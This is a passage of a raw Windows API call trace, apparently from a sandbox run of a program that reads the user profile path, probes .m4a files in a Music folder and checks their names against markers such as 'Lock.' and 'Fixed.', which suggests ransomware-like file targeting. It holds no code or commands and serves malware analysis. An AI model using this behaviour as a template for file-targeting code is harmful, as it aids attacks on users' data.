Flags=0x0, Size=0xca) returned 0x24207f0 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0254.120] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.120] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0254.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a", lpFilePart=0x8bf658*="xBQp6dTr52cBE6l-Un.m4a") returned 0x3a [0254.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0254.122] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xbqp6dtr52cbe6l-un.m4a")) returned 0xffffffff [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0254.123] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.123] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.123] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XeP-i8.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eP-i8.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-i8.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-i8.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i8.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.125] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XeP-i8.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eP-i8.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-i8.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-i8.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i8.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.125] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0254.125] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0254.125] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.126] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.126] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0254.126] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0254.126] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.126] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0254.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0254.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31000460, ftCreationTime.dwHighDateTime=0x1d4d30c, ftLastAccessTime.dwLowDateTime=0x5e0e5bf0, ftLastAccessTime.dwHighDateTime=0x1d4d0be, ftLastWriteTime.dwLowDateTime=0x5e0e5bf0, ftLastWriteTime.dwHighDateTime=0x1d4d0be, nFileSizeHigh=0x0, nFileSizeLow=0x267b, dwReserved0=0x530530, dwReserved1=0xefe7, cFileName="XeP-i8.m4a", cAlternateFileName="")) returned 0xaa59a0 [0254.127] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0254.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.138] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0254.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.141] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.144] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0254.144] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.144] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.145] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.145] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.145] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.145] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 